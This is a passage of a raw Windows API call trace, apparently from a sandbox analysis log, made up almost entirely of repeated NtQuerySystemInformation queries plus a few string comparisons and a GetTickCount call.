(_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff1d0, Length=0x50, ResultLength=0x0) [0221.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x28, ResultLength=0x0) [0221.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x28, ResultLength=0x0) [0221.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x28, ResultLength=0x0) [0221.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fefa0, Length=0x28, ResultLength=0x0) [0221.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff020, Length=0x28, ResultLength=0x0) [0221.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff020, Length=0x28, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef80, Length=0x20, ResultLength=0x0) [0221.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef00, Length=0x20, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef00, Length=0x20, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef00, Length=0x20, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef80, Length=0x20, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0221.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff220, Length=0x58, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff190, Length=0x28, ResultLength=0x0) [0221.957] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff220, Length=0x58, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff220, Length=0x58, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff220, Length=0x58, ResultLength=0x0) [0221.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef40, Length=0x28, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef40, Length=0x28, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef40, Length=0x28, ResultLength=0x0) [0221.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fefb0, Length=0x28, ResultLength=0x0) [0221.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0221.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff030, Length=0x28, ResultLength=0x0) [0222.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff030, Length=0x28, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0222.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feea0, Length=0x20, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee20, Length=0x20, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee20, Length=0x20, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee20, Length=0x20, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff070, Length=0x20, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0222.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef90, Length=0x20, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef90, Length=0x20, ResultLength=0x0) [0222.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x20, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff100, Length=0x38, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef90, Length=0x20, ResultLength=0x0) [0222.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef20, Length=0x20, ResultLength=0x0) [0222.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef20, Length=0x20, ResultLength=0x0) [0222.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff220, Length=0x58, ResultLength=0x0) [0222.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff160, Length=0x20, ResultLength=0x0) [0222.099] GetTickCount () returned 0x1177f93 [0222.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff018, Length=0x58, ResultLength=0x0) [0222.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x38, ResultLength=0x0) [0222.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed60, Length=0x28, ResultLength=0x0) [0222.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed60, Length=0x28, ResultLength=0x0) [0222.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed60, Length=0x28, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed60, Length=0x28, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedd0, Length=0x28, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x38, ResultLength=0x0) [0222.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x28, ResultLength=0x0) [0222.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x28, ResultLength=0x0) [0222.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x38, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x20, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x20, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x20, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x20, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef30, Length=0x38, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x20, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed40, Length=0x20, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed40, Length=0x20, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff018, Length=0x58, ResultLength=0x0) [0222.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x28, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x28, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x28, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x28, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feda0, Length=0x28, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feef0, Length=0x38, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee20, Length=0x28, ResultLength=0x0) [0222.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 